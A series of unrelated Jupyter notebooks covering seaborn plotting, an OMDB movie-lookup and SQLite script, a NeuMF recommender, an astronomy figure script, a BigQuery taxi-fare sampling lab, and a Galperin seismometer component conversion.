sns.jointplot(x="x", y="y", data=df)
```
### Hexbin plot
```
sns.jointplot(x="x", y="y", data=df, kind="hex")
```
### Kernel density estimation
```
sns.jointplot(x="x", y="y", data=df, kind="kde")
```
## Visualizing pairwise relationships in a dataset
To plot multiple pairwise bivariate distributions in a dataset, you can use the pairplot() function. This creates a matrix of axes and shows the relationship for each pair of columns in a DataFrame. by default, it also draws the univariate distribution of each variable on the diagonal Axes:
```
iris = sns.load_dataset("iris")
sns.pairplot(iris)
# we can add colors to different species
sns.pairplot(iris, hue="species")
```
### Visualizing linear relationships
```
tips = sns.load_dataset("tips")
tips.head()
```
We can use the function `regplot` to show the linear relationship between total_bill and tip.
It also shows the 95% confidence interval.
```
sns.regplot(x="total_bill", y="tip", data=tips)
```
### Visualizing higher order relationships
```
anscombe = sns.load_dataset("anscombe")
sns.regplot(x="x", y="y", data=anscombe[anscombe["dataset"] == "II"])
```
The plot clearly shows that this is not a good model.
Let's try to fit a polynomial regression model with degree 2.
```
sns.regplot(x="x", y="y", data=anscombe[anscombe["dataset"] == "II"], order=2)
```
### Strip plots
This is similar to a scatter plot but is used when one variable is categorical.
```
sns.stripplot(x="day", y="total_bill", data=tips)
```
### Boxplots
```
sns.boxplot(x="day", y="total_bill", hue="time", data=tips)
```
### Bar plots
```
titanic = sns.load_dataset("titanic")
sns.barplot(x="sex", y="survived", hue="class", data=titanic)
```
| github_jupyter |
## This notebook does the following
* **Retrieves and prints basic data about a movie (title entered by user) from the web (OMDB database)**
* **If a poster of the movie could be found, it downloads the file and saves it in a local `Posters` directory**
* **Finally, stores the movie data in a local SQLite database**
```
import urllib.request, urllib.parse, urllib.error
import json
```
### Gets the secret API key (you have to get one from OMDB website and use that, 1000 daily limit) from a JSON file, stored in the same folder
```
with open('APIkeys.json') as f:
keys = json.load(f)
omdbapi = keys['OMDBapi']
serviceurl = 'http://www.omdbapi.com/?'
apikey = '&apikey='+omdbapi
```
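Before the helper functions below, it may help to see the retrieval step itself. This is a hedged sketch (the function name `search_movie` and the error handling are mine, not necessarily what the notebook uses later): OMDB is queried with the `t=` title parameter, and the `Response` field of the JSON reply says whether the lookup succeeded.

```python
import urllib.request, urllib.parse, urllib.error
import json

def search_movie(title, serviceurl='http://www.omdbapi.com/?', apikey=''):
    """Fetch movie data from OMDB; return the parsed JSON dict, or None on failure."""
    url = serviceurl + urllib.parse.urlencode({'t': title}) + apikey
    try:
        raw = urllib.request.urlopen(url).read().decode()
    except urllib.error.URLError as e:
        print('Could not reach the server:', e.reason)
        return None
    data = json.loads(raw)
    if data.get('Response') == 'True':
        return data
    print('Error encountered:', data.get('Error'))
    return None
```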
### Function for printing a JSON dataset
```
def print_json(json_data):
list_keys=['Title', 'Year', 'Rated', 'Released', 'Runtime', 'Genre', 'Director', 'Writer',
'Actors', 'Plot', 'Language', 'Country', 'Awards', 'Ratings',
'Metascore', 'imdbRating', 'imdbVotes', 'imdbID']
print("-"*50)
for k in list_keys:
if k in list(json_data.keys()):
print(f"{k}: {json_data[k]}")
print("-"*50)
```
### Function to download a poster of the movie based on the information from the JSON dataset
**Saves the downloaded poster in a local directory called 'Posters'**
```
def save_poster(json_data):
    import os
    title = json_data['Title']
    poster_url = json_data['Poster']
    # Splits the poster url by '.' and picks up the last string as file extension
    poster_file_extension=poster_url.split('.')[-1]
    # Reads the image file from the web
    poster_data = urllib.request.urlopen(poster_url).read()
    # os.path.join keeps the path portable across operating systems
    savelocation=os.path.join(os.getcwd(),'Posters')
    # Creates a new directory if it does not exist. Otherwise, just use the existing path.
    if not os.path.isdir(savelocation):
        os.mkdir(savelocation)
    filename=os.path.join(savelocation,str(title)+'.'+poster_file_extension)
    with open(filename,'wb') as f:
        f.write(poster_data)
```
### Function to create/update the local movie database with the data retrieved from the web
**Saves the movie data (Title, Year, Runtime, Country, Metascore, and IMDB rating) into a local SQLite database whose name is chosen by the user (e.g. 'movies.sqlite')**
```
def save_in_database(json_data):
filename = input("Please enter a name for the database (extension not needed, it will be added automatically): ")
filename = filename+'.sqlite'
import sqlite3
conn = sqlite3.connect(str(filename))
cur=conn.cursor()
title = json_data['Title']
    # Goes through the json dataset and extracts information if it is available.
    # Default values guard against a NameError when a field comes back as 'N/A'.
    year, runtime, country = -1, -1, 'N/A'
    if json_data['Year']!='N/A':
        year = int(json_data['Year'])
    if json_data['Runtime']!='N/A':
        runtime = int(json_data['Runtime'].split()[0])
    if json_data['Country']!='N/A':
        country = json_data['Country']
    if json_data['Metascore']!='N/A':
        metascore = float(json_data['Metascore'])
    else:
        metascore=-1
    if json_data['imdbRating']!='N/A':
        imdb_rating = float(json_data['imdbRating'])
    else:
        imdb_rating=-1
# SQL commands
cur.execute('''CREATE TABLE IF NOT EXISTS MovieInfo
(Title TEXT, Year INTEGER, Runtime INTEGER, Country TEXT, Metascore REAL, IMDBRating REAL)''')
cur.execute('SELECT Title FROM MovieInfo WHERE Title = ? ', (title,))
row = cur.fetchone()
if row is None:
cur.execute('''INSERT INTO MovieInfo (Title, Year, Runtime, Country, Metascore, IMDBRating)
VALUES (?,?,?,?,?,?)''', (title,year,runtime,country,metascore,imdb_rating))
else:
print("Record already found. No update made.")
# Commits the change and close the connection to the database
conn.commit()
conn.close()
```
### Function to print contents of the local database
```
def print_database(database):
import sqlite3
conn = sqlite3.connect(str(database))
cur=conn.cursor()
for row in cur.execute('SELECT * FROM MovieInfo'):
print(row)
conn.close()
```
### Function to save the database content in an Excel file
```
def save_in_excel(filename, database):
if filename.split('.')[-1]!='xls' and filename.split('.')[-1]!='xlsx':
print ("Filename does not have correct extension. Please try again")
return None
import pandas as pd
import sqlite3
#df=pd.DataFrame(columns=['Title','Year', 'Runtime', 'Country', 'Metascore', 'IMDB_Rating'])
conn = sqlite3.connect(str(database))
#cur=conn.cursor()
df=pd.read_sql_query("SELECT * FROM MovieInfo", conn)
conn.close()
df.to_excel(filename,sheet_name='Movie Info')
```
### Function to search for information about a movie
```
def search_movie(title):
if len(title) < 1 or title=='quit':
print("Goodbye now...")
return None
try:
url = serviceurl + urllib.parse.urlencode({'t': title})+apikey
print(f'Retrieving the data of "{title}" now... ')
uh = urllib.request.urlopen(url)
data = uh.read()
json_data=json.loads(data)
if json_data['Response']=='True':
print_json(json_data)
# Asks user whether to download the poster of the movie
if json_data['Poster']!='N/A':
poster_yes_no=input ('Poster of this movie can be downloaded. Enter "yes" or "no": ').lower()
if poster_yes_no=='yes':
save_poster(json_data)
# Asks user whether to save the movie information in a local database
save_database_yes_no=input ('Save the movie info in a local database? Enter "yes" or "no": ').lower()
if save_database_yes_no=='yes':
save_in_database(json_data)
else:
print("Error encountered: ",json_data['Error'])
except urllib.error.URLError as e:
print(f"ERROR: {e.reason}")
```
#### Search for 'Titanic'
```
title = input('\nEnter the name of a movie (enter \'quit\' or hit ENTER to quit): ')
if len(title) < 1 or title=='quit':
print("Goodbye now...")
else:
search_movie(title)
```
#### Show the downloaded poster of 'Titanic'
```
from IPython.display import Image
Image("Posters/Titanic.jpg")
```
#### Print the content of the local database, only single entry so far
```
print_database('movies.sqlite')
```
#### Search for 'Jumanji'
```
title = input('\nEnter the name of a movie (enter \'quit\' or hit ENTER to quit): ')
if len(title) < 1 or title=='quit':
print("Goodbye now...")
else:
search_movie(title)
```
#### Search for "To kill a mockingbird"
```
title = input('\nEnter the name of a movie (enter \'quit\' or hit ENTER to quit): ')
if len(title) < 1 or title=='quit':
print("Goodbye now...")
else:
search_movie(title)
```
#### Search for "Titanic" again, note while trying to save the record, the message from the database connection saying 'Record already found'
```
title = input('\nEnter the name of a movie (enter \'quit\' or hit ENTER to quit): ')
if len(title) < 1 or title=='quit':
print("Goodbye now...")
else:
search_movie(title)
```
#### Print the database contents again
```
print_database('movies.sqlite')
```
#### Save the database content into an Excel file
```
save_in_excel('test.xlsx','movies.sqlite')
import pandas as pd
df=pd.read_excel('test.xlsx')
df
```
| github_jupyter |
http://preview.d2l.ai/d2l-en/master/chapter_recommender-systems/neumf.html
```
from d2l import mxnet as d2l
from mxnet import autograd, gluon, np, npx
from mxnet.gluon import nn
import mxnet as mx
import random
import sys
npx.set_np()
class NeuMF(nn.Block):
def __init__(self, num_factors, num_users, num_items, nums_hiddens,
**kwargs):
super(NeuMF, self).__init__(**kwargs)
self.P = nn.Embedding(num_users, num_factors)
self.Q = nn.Embedding(num_items, num_factors)
self.U = nn.Embedding(num_users, num_factors)
self.V = nn.Embedding(num_items, num_factors)
self.mlp = nn.Sequential()
for num_hiddens in nums_hiddens:
self.mlp.add(nn.Dense(num_hiddens, activation='relu',
use_bias=True))
def forward(self, user_id, item_id):
p_mf = self.P(user_id)
q_mf = self.Q(item_id)
gmf = p_mf * q_mf
p_mlp = self.U(user_id)
q_mlp = self.V(item_id)
mlp = self.mlp(np.concatenate([p_mlp, q_mlp], axis=1))
con_res = np.concatenate([gmf, mlp], axis=1)
return np.sum(con_res, axis=-1)
class PRDataset(gluon.data.Dataset):
def __init__(self, users, items, candidates, num_items):
self.users = users
self.items = items
self.cand = candidates
self.all = set([i for i in range(num_items)])
def __len__(self):
return len(self.users)
def __getitem__(self, idx):
neg_items = list(self.all - set(self.cand[int(self.users[idx])]))
indices = random.randint(0, len(neg_items) - 1)
return self.users[idx], self.items[idx], neg_items[indices]
#@save
def hit_and_auc(rankedlist, test_matrix, k):
hits_k = [(idx, val) for idx, val in enumerate(rankedlist[:k])
if val in set(test_matrix)]
hits_all = [(idx, val) for idx, val in enumerate(rankedlist)
if val in set(test_matrix)]
    max_rank = len(rankedlist) - 1  # avoid shadowing the built-in max
    auc = 1.0 * (max_rank - hits_all[0][0]) / max_rank if len(hits_all) > 0 else 0
return len(hits_k), auc
#@save
def evaluate_ranking(net, test_input, seq, candidates, num_users, num_items,
devices):
ranked_list, ranked_items, hit_rate, auc = {}, {}, [], []
    all_items = set([i for i in range(num_items)])  # candidate pool is the set of items
for u in range(num_users):
neg_items = list(all_items - set(candidates[int(u)]))
user_ids, item_ids, x, scores = [], [], [], []
[item_ids.append(i) for i in neg_items]
[user_ids.append(u) for _ in neg_items]
x.extend([np.array(user_ids)])
if seq is not None:
x.append(seq[user_ids, :])
x.extend([np.array(item_ids)])
test_data_iter = gluon.data.DataLoader(
gluon.data.ArrayDataset(*x), shuffle=False, last_batch="keep",
batch_size=1024)
for index, values in enumerate(test_data_iter):
x = [gluon.utils.split_and_load(v, devices, even_split=False)
for v in values]
scores.extend([list(net(*t).asnumpy()) for t in zip(*x)])
scores = [item for sublist in scores for item in sublist]
item_scores = list(zip(item_ids, scores))
ranked_list[u] = sorted(item_scores, key=lambda t: t[1], reverse=True)
ranked_items[u] = [r[0] for r in ranked_list[u]]
temp = hit_and_auc(ranked_items[u], test_input[u], 50)
hit_rate.append(temp[0])
auc.append(temp[1])
return np.mean(np.array(hit_rate)), np.mean(np.array(auc))
#@save
def train_ranking(net, train_iter, test_iter, loss, trainer, test_seq_iter,
num_users, num_items, num_epochs, devices, evaluator,
candidates, eval_step=1):
timer, hit_rate, auc = d2l.Timer(), 0, 0
animator = d2l.Animator(xlabel='epoch', xlim=[1, num_epochs], ylim=[0, 1],
legend=['test hit rate', 'test AUC'])
for epoch in range(num_epochs):
metric, l = d2l.Accumulator(3), 0.
for i, values in enumerate(train_iter):
input_data = []
for v in values:
input_data.append(gluon.utils.split_and_load(v, devices))
with autograd.record():
p_pos = [net(*t) for t in zip(*input_data[0:-1])]
p_neg = [net(*t) for t in zip(*input_data[0:-2],
input_data[-1])]
ls = [loss(p, n) for p, n in zip(p_pos, p_neg)]
[l.backward(retain_graph=False) for l in ls]
l += sum([l.asnumpy() for l in ls]).mean()/len(devices)
trainer.step(values[0].shape[0])
metric.add(l, values[0].shape[0], values[0].size)
timer.stop()
with autograd.predict_mode():
if (epoch + 1) % eval_step == 0:
hit_rate, auc = evaluator(net, test_iter, test_seq_iter,
candidates, num_users, num_items,
devices)
animator.add(epoch + 1, (hit_rate, auc))
print(f'train loss {metric[0] / metric[1]:.3f}, '
f'test hit rate {float(hit_rate):.3f}, test AUC {float(auc):.3f}')
print(f'{metric[2] * num_epochs / timer.sum():.1f} examples/sec '
f'on {str(devices)}')
batch_size = 1024
df, num_users, num_items = d2l.read_data_ml100k()
train_data, test_data = d2l.split_data_ml100k(df, num_users, num_items,
'seq-aware')
users_train, items_train, ratings_train, candidates = d2l.load_data_ml100k(
train_data, num_users, num_items, feedback="implicit")
users_test, items_test, ratings_test, test_iter = d2l.load_data_ml100k(
test_data, num_users, num_items, feedback="implicit")
train_iter = gluon.data.DataLoader(
PRDataset(users_train, items_train, candidates, num_items ), batch_size,
True, last_batch="rollover", num_workers=d2l.get_dataloader_workers())
devices = d2l.try_all_gpus()
net = NeuMF(10, num_users, num_items, nums_hiddens=[10, 10, 10])
net.initialize(ctx=devices, force_reinit=True, init=mx.init.Normal(0.01))
lr, num_epochs, wd, optimizer = 0.01, 10, 1e-5, 'adam'
loss = d2l.BPRLoss()
trainer = gluon.Trainer(net.collect_params(), optimizer,
{"learning_rate": lr, 'wd': wd})
train_ranking(net, train_iter, test_iter, loss, trainer, None, num_users,
num_items, num_epochs, devices, evaluate_ranking, candidates)
```
| github_jupyter |
## Introduction to the Interstellar Medium
### Jonathan Williams
### Figure 7.9: map of integrated CS J=2-1 emission in a star-forming clump in the Rosette molecular cloud
#### from observations taken with the IRAM 30m telescope by the author in 2002
#### infrared data are from the UKIRT Infrared Deep Sky Survey public release (http://wsa.roe.ac.uk/)
#### uses reproject.py from https://pypi.org/project/reproject/
```
import numpy as np
import matplotlib.pyplot as plt
from astropy.io import fits
from astropy.wcs import WCS
from astropy.visualization import (ImageNormalize, SqrtStretch, LogStretch, AsinhStretch)
from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans
from scipy.ndimage import gaussian_filter  # scipy.ndimage.filters is deprecated
%matplotlib inline
import sys
!{sys.executable} -m pip install reproject
import reproject
fig = plt.figure(figsize=(8, 6.5))
ax = fig.add_subplot(111)
# resample galactic CS to equatorial K band
hdu1 = fits.open('rosette_clump_UKIDSS_K.fits')[0]
hd1 = hdu1.header
hdu2 = fits.open('rosette_clump_IRAM_CS21.fits')[0]
cs, footprint = reproject.reproject_adaptive(hdu2, hd1)
ir = hdu1.data
nx, x0, dx, i0 = hd1['naxis1'], hd1['crval1'], hd1['cdelt1'], hd1['crpix1']
ny, y0, dy, j0 = hd1['naxis2'], hd1['crval2'], hd1['cdelt2'], hd1['crpix2']
# manual crop
imin, imax = 248, 749
jmin, jmax = 345, 735
xmin, xmax = x0+(imax-i0)*dx, x0+(imin-i0)*dx
ymin, ymax = y0+(jmin-j0)*dy, y0+(jmax-j0)*dy
xcen = (xmin+xmax)/2
ycen = (ymin+ymax)/2
xmin, xmax = 3600*(xmin-xcen), 3600*(xmax-xcen)
ymin, ymax = 3600*(ymin-ycen), 3600*(ymax-ycen)
extent = [xmax, xmin, ymin, ymax]
#print(extent)
ir_crop = ir[jmin:jmax, imin:imax]
cs_crop = cs[jmin:jmax, imin:imax]
#print(ir_crop.min(), ir_crop.max())
#print(np.nanmin(cs_crop), np.nanmax(cs_crop))
levs = np.arange(1,8,0.5)
# plot K band image in reverse
norm = ImageNormalize(ir, stretch=AsinhStretch(0.3))
ax.imshow(ir_crop, cmap='gray_r', vmin=2650, vmax=3650, origin='lower', norm=norm, extent=extent)
# lightly smooth CS contours to improve SNR and visual appearance
#ax.contour(cs_crop, levels=levs, colors='black', extent=extent)
ax.contour(gaussian_filter(cs_crop,3), levels=levs, colors='black', extent=extent)
ax.tick_params(direction='in', length=4, width=2, colors='black', labelcolor='black', labelsize=14)
x_labels = ['-80','-60','-40','-20', '0', '20', '40', '60', '80']
x_loc = np.array([float(x) for x in x_labels])
ax.set_xticks(x_loc)
ax.set_xticklabels(x_labels)
ax.set_xlim(extent[0], extent[1])
ax.set_ylim(extent[2], extent[3])
ax.set_xlabel(r"$\Delta\alpha\ ('')$", fontsize=18)
ax.set_ylabel(r"$\Delta\delta\ ('')$", fontsize=18)
ax.text(0.04,0.92, r'CS 2-1 / 2.2$\mu$m', {'color': 'black', 'fontsize': 16}, transform=ax.transAxes)
# 0.2 pc = 26 arcsec at 1600 pc
xbar1 = 82
xbar2 = xbar1 - 26
ybar = -60
ax.fill([xbar1+1,xbar2-1,xbar2-1,xbar1+1], [ybar-3,ybar-3,ybar+6,ybar+6], color='white', alpha=0.7, zorder=99)
ax.plot([xbar1,xbar2], [ybar, ybar], lw=2, color='black', zorder=100)
ax.plot([xbar1,xbar1], [ybar-2, ybar+2], lw=2, color='black', zorder=100)
ax.plot([xbar2,xbar2], [ybar-2, ybar+2], lw=2, color='black', zorder=100)
ax.text(0.5*(xbar1+xbar2), ybar+2, '0.2 pc', ha='center', color='black', fontsize=12, zorder=100)
plt.tight_layout()
plt.savefig('rosette_clump.pdf')
```
| github_jupyter |
# Sample, Explore, and Clean Taxifare Dataset
**Learning Objectives**
- Practice querying BigQuery
- Sample from large dataset in a reproducible way
- Practice exploring data using Pandas
- Identify corrupt data and clean accordingly
## Introduction
In this notebook, we will explore a dataset corresponding to taxi rides in New York City to build a Machine Learning model that estimates taxi fares. The idea is to suggest a likely fare to taxi riders so that they are not surprised, and so that they can protest if the charge is much higher than expected. Such a model would also be useful for ride-hailing apps that quote you the trip price in advance.
### Set up environment variables and load necessary libraries
```
PROJECT = 'cloud-training-demos' # Replace with your PROJECT
REGION = 'us-central1' # Choose an available region for Cloud MLE
import os
os.environ['PROJECT'] = PROJECT
os.environ['REGION'] = REGION
```
Check that the Google BigQuery library is installed and if not, install it.
```
!pip freeze | grep google-cloud-bigquery==1.6.1 || pip install google-cloud-bigquery==1.6.1
```
## View data schema and size
Our dataset is hosted in [BigQuery](https://cloud.google.com/bigquery/): Google's petabyte scale, SQL queryable, fully managed cloud data warehouse. It is a publicly available dataset, meaning anyone with a GCP account has access.
1. Click [here](https://console.cloud.google.com/bigquery?project=bigquery-public-data&p=nyc-tlc&d=yellow&t=trips&page=table) to access the dataset.
2. In the web UI, below the query editor, you will see the schema of the dataset. What fields are available, what does each mean?
3. Click the 'details' tab. How big is the dataset?
## Preview data
Let's see what a few rows of our data looks like. Any cell that starts with `%%bigquery` will be interpreted as a SQL query that is executed on BigQuery, and the result is printed to our notebook.
BigQuery supports [two flavors](https://cloud.google.com/bigquery/docs/reference/standard-sql/migrating-from-legacy-sql#comparison_of_legacy_and_standard_sql) of SQL syntax: legacy SQL and standard SQL. Standard SQL is preferred because it complies with the official SQL:2011 standard. To instruct BigQuery to interpret our syntax as such we start the query with `#standardSQL`.
There are over 1 billion rows in this dataset and it is 130 GB in size, so let's retrieve a small sample.
```
%%bigquery --project $PROJECT
#standardSQL
SELECT
*
FROM
`nyc-tlc.yellow.trips`
WHERE RAND() < .0000001 -- sample a small fraction of the data
```
### Preview data (alternate way)
Alternatively we can use BigQuery's web UI to execute queries.
1. Open the [web UI](https://console.cloud.google.com/bigquery)
2. Paste the above query minus the `%%bigquery` part into the Query Editor
3. Click the 'Run' button or type 'CTRL + ENTER' to execute the query
Query results will be displayed below the Query editor.
## Sample data repeatably
There's one issue with using `RAND() < N` to sample: it's non-deterministic. Each time you run the query above you'll get a different sample.
Since repeatability is key to data science, let's instead use a hash function (which is deterministic by definition) and then sample using the modulo operation on the hashed value.
We obtain our hash values using:
`ABS(FARM_FINGERPRINT(CAST(hashkey AS STRING)))`
Working from inside out:
- `CAST()`: Casts hashkey to string because our hash function only works on strings
- `FARM_FINGERPRINT()`: Hashes strings to 64bit integers
- `ABS()`: Takes the absolute value of the integer. This is not strictly necessary, but it makes the following modulo operations more intuitive since we don't have to account for negative remainders.*
The `hashkey` should be:
1. Unrelated to the objective
2. Sufficiently high cardinality
Given these properties we can sample our data repeatably using the modulo operation.
To get a 1% sample:
`WHERE MOD(hashvalue,100) = 0`
To get a *different* 1% sample change the remainder condition, for example:
`WHERE MOD(hashvalue,100) = 55`
To get a 20% sample:
`WHERE MOD(hashvalue,100) < 20` Alternatively: `WHERE MOD(hashvalue,5) = 0`
And so forth...
We'll use `pickup_datetime` as our hash key because it meets our desired properties. If such a column doesn't exist in the data you can synthesize a hashkey by concatenating multiple columns.
Below we sample 1/5000th of the data. The syntax is admittedly less elegant than `RAND() < N`, but now each time you run the query you'll get the same result.
\**Tech note: Taking the absolute value doubles the chance of hash collisions, but since there are 2^64 possible hash values and fewer than 2^30 hash keys, the collision risk is negligible.*
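The same idea can be sketched in plain Python, using `hashlib.md5` here as a stand-in for `FARM_FINGERPRINT` — any deterministic hash of a string works. The helper function and the example row values are purely illustrative, not part of the BigQuery API.

```
import hashlib

def in_sample(hashkey, buckets=100, remainder=0):
    """Deterministically decide whether a row belongs to the sample."""
    hashvalue = int(hashlib.md5(hashkey.encode()).hexdigest(), 16)
    return hashvalue % buckets == remainder

# The answer for a given key never changes between runs,
# unlike RAND() < N, so the sample is repeatable.
rows = ['2014-05-01 09:00:00', '2014-05-01 09:05:00', '2014-05-02 17:30:00']
one_percent_sample = [r for r in rows if in_sample(r, buckets=100, remainder=0)]
```

Changing `remainder` picks a *different* repeatable sample, just like changing the remainder condition in the SQL `MOD` clause.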
#### **Exercise 1**
Modify the BigQuery query above to produce a repeatable sample of the taxi fare data.
Replace the RAND operation above with a FARM_FINGERPRINT operation that will yield a repeatable 1/5000th sample of the data.
```
%%bigquery --project $PROJECT
# TODO: Your code goes here
```
## Load sample into Pandas dataframe
The advantage of querying BigQuery directly, as opposed to using the web UI, is that we can supplement SQL analysis with Python analysis. A popular Python library for data analysis on structured data is [Pandas](https://pandas.pydata.org/), and the primary data structure in Pandas is called a DataFrame.
To store BigQuery results in a Pandas DataFrame we have to query the data with a slightly different syntax.
1. Import the `bigquery` module from `google.cloud`
2. Store the desired SQL query as a Python string
3. Create a BigQuery client and execute `client.query(query_string).to_dataframe()` where `query_string` is what you created in the previous step
**This will take about a minute**
*Tip: Use triple quotes for a multi-line string in Python*
*Tip: You can measure execution time of a cell by starting that cell with `%%time`*
#### **Exercise 2**
Store the results of the query you created in the previous TODO above in a Pandas DataFrame called `trips`.
You will need to import the `bigquery` module from Google Cloud and store the query as a string before executing the query. Then,
- Create a variable called `bq` which contains the BigQuery Client
- Copy/paste the query string from above
- Use the BigQuery Client to execute the query and save it to a Pandas dataframe
```
%%time
from google.cloud import bigquery
bq = # TODO: Your code goes here
query_string="""
# TODO: Your code goes here
"""
trips = # TODO: Your code goes here
```
## Explore dataframe
```
print(type(trips))
trips.head()
```
The Python variable `trips` is now a Pandas DataFrame. The `.head()` function above prints the first 5 rows of a DataFrame.
The rows in the DataFrame may be in a different order than when using `%%bigquery`, but the data is the same.
It would be useful to understand the distribution of each of our columns, which is to say the mean, min, max, standard deviation, etc.
A DataFrame's `.describe()` method provides this. By default it only analyzes numeric columns. To include stats about non-numeric columns use `describe(include='all')`.
```
trips.describe()
```
## Distribution analysis
Do you notice anything off about the data? Pay attention to `min` and `max`. Latitudes should be between -90 and 90, and longitudes should be between -180 and 180, so clearly some of this data is bad.
Furthermore, some trip fares are negative and some passenger counts are 0, which doesn't seem right. We'll clean this up later.
## Investigate trip distance
Looks like some trip distances are 0 as well, let's investigate this.
```
trips[trips['trip_distance'] == 0][:10] # first 10 rows with trip_distance == 0
```
It appears that trips are being charged substantial fares despite having 0 distance.
Let's graph `trip_distance` vs `fare_amount` using the Pandas [`.plot()`](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.plot.html) method to corroborate.
```
%matplotlib inline
trips.plot(x ="trip_distance", y ="fare_amount", kind='scatter')
```
It appears that we have a lot of invalid data that is being coded as zero distance and some fare amounts that are definitely illegitimate. Let's remove them from our analysis. We can do this by modifying the BigQuery query to keep only trips longer than zero miles and fare amounts that are at least the minimum cab fare ($2.50).
## Identify correct label
Should we use `fare_amount` or `total_amount` as our label? What's the difference?
To make this clear let's look at some trips that included a toll.
#### **Exercise 3**
Use the pandas DataFrame indexing to look at a subset of the trips dataframe created above where the `tolls_amount` is positive.
**Hint**: You can index the dataframe over values which have `trips['tolls_amount'] > 0`.
```
# TODO: Your code goes here
```
What do you see looking at the samples above? Does `total_amount` always reflect `fare_amount` + `tolls_amount` + tip? Why would there be a discrepancy?
To account for this, we will use the sum of `fare_amount` and `tolls_amount`
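As a small illustration of that choice, the label can be computed column-wise in Pandas. The numbers below are made up for the sketch; they are not taken from the dataset.

```
import pandas as pd

trips = pd.DataFrame({
    'fare_amount':  [9.5, 12.0],
    'tolls_amount': [0.0, 5.76],
    'tip_amount':   [2.0, 0.0],
})
# Label = metered fare plus tolls; tips are excluded because they are
# discretionary and not knowable before the ride.
trips['label'] = trips['fare_amount'] + trips['tolls_amount']
```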
## Select useful fields
What fields do you see that may be useful in modeling taxifare? They should be
1. Related to the objective
2. Available at prediction time
**Related to the objective**
For example, we know `passenger_count` shouldn't have any effect on fare because fare is calculated by time and distance. Best to eliminate it to reduce the amount of noise in the data and make the job of the ML algorithm easier.
If you're not sure whether a column is related to the objective, err on the side of keeping it and let the ML algorithm figure out whether it's useful or not.
**Available at prediction time**
For example `trip_distance` is certainly related to the objective, but we can't know the value until a trip is completed (depends on the route taken), so it can't be used for prediction.
**We will use the following**
`pickup_datetime`, `pickup_longitude`, `pickup_latitude`, `dropoff_longitude`, and `dropoff_latitude`.
## Clean the data
We need to do some clean-up of the data:
- Filter to latitudes and longitudes that are reasonable for NYC
    - the pickup longitude and dropoff longitude should lie between -78 degrees and -70 degrees
    - the pickup latitude and dropoff latitude should lie between 37 degrees and 45 degrees
- We shouldn't include fare amounts less than $2.50
- Trip distances and passenger counts should be non-zero
- Have the label reflect the sum of fare_amount and tolls_amount
Let's change the BigQuery query appropriately, and only return the fields we'll use in our model.
#### **Exercise 4**
Look at the TODOs in the SQL query below. Add additional conditions to the `WHERE` clause to restrict the fare amount of the taxi rides and the pickup and dropoff latitude and longitude values.
```
%%bigquery --project $PROJECT
#standardSQL
SELECT
(tolls_amount + fare_amount) AS fare_amount, -- create label that is the sum of fare_amount and tolls_amount
pickup_datetime,
pickup_longitude,
pickup_latitude,
dropoff_longitude,
dropoff_latitude
FROM
`nyc-tlc.yellow.trips`
WHERE
-- Clean Data
trip_distance > 0
AND passenger_count > 0
TODO: Your code goes here
TODO: Your code goes here
-- create a repeatable 1/5000th sample
AND MOD(ABS(FARM_FINGERPRINT(CAST(pickup_datetime AS STRING))),5000) = 1
```
We now have a repeatable and clean sample we can use for modeling taxi fares.
Copyright 2019 Google Inc.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
| github_jupyter |
# **Galperin Conversion**
In this module we convert the Z,N,E output of a seismometer with Galperin topology, also known as _homogeneous triaxial arrangement_ and used, e.g., in the STS-2 series and the Nanometrics Trillium family, back to the original U,V,W traces of the three internal sensors. It also gives the option to re-convert from U,V,W to Z,N,E. This module contains only the conversion matrix for the STS-2 and not for the Trillium family of instruments. It should also not be used with the output of seismometers with a classical topology, where the three internal sensors are orthogonally arranged along the cardinal directions Z,N,E (e.g. Guralp 3T or MBB-2).
```
import numpy as np
import matplotlib.pyplot as plt
import obspy
from obspy import read, read_inventory
from obspy import UTCDateTime
```
Read file with stream to be converted
```
st = read("./Instr Test/STS-2-Test")  # 'st' avoids shadowing the built-in str
print(st.__str__(extended=True))
#create overview plots, full length of file
st.plot(color='black',size=(1000,400),equal_scale=True)
numpoints = st[0].stats.npts
print(numpoints)
```
Separate the data stream into three arrays containing the Z,N,E traces, then convert them into three new arrays containing the U,V,W traces.
```
%%time
t=np.zeros(numpoints)
U=np.zeros(numpoints)
V=np.zeros(numpoints)
W=np.zeros(numpoints)
Z=st[2].data
N=st[1].data
E=st[0].data
#preparing the conversion matrix for STS-2 only
w6=np.sqrt(6)
w6=1/w6
w3=np.sqrt(3)
w2=np.sqrt(2)
print (w6,w3,w2)
for i in range (numpoints):
t[i]=i/100
U[i]= w6*(-2*E[i]+w2*Z[i])
V[i]= w6*(E[i]+w3*N[i]+w2*Z[i])
W[i]= w6*(E[i]-w3*N[i]+w2*Z[i])
#plotting the new traces U,V,W
plt.rcParams['figure.figsize'] = [12, 5]
plt.plot (t,U,color='r',label="U")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,V,color='b',label="V")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,W,color='g',label="W")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid(which='both')
plt.legend()
plt.show()
```
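The element-wise loops above can equivalently be written as a single matrix multiplication. Below is a sketch with synthetic traces: the matrix rows use the same STS-2 coefficients as the loop, and because the matrix is orthogonal, its transpose performs the back-conversion.

```
import numpy as np

w6 = 1/np.sqrt(6)
# Rows map (E, N, Z) to (U, V, W) for the STS-2 Galperin arrangement
A = w6 * np.array([[-2.0,         0.0, np.sqrt(2)],
                   [ 1.0,  np.sqrt(3), np.sqrt(2)],
                   [ 1.0, -np.sqrt(3), np.sqrt(2)]])

rng = np.random.default_rng(0)
E_syn, N_syn, Z_syn = rng.normal(size=(3, 1000))  # synthetic E,N,Z traces

U_syn, V_syn, W_syn = A @ np.vstack([E_syn, N_syn, Z_syn])
# A is orthogonal, so the back-conversion is simply the transpose:
E_back, N_back, Z_back = A.T @ np.vstack([U_syn, V_syn, W_syn])
```

Orthogonality is also why the residuals computed in the next cell should be zero up to floating-point precision.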
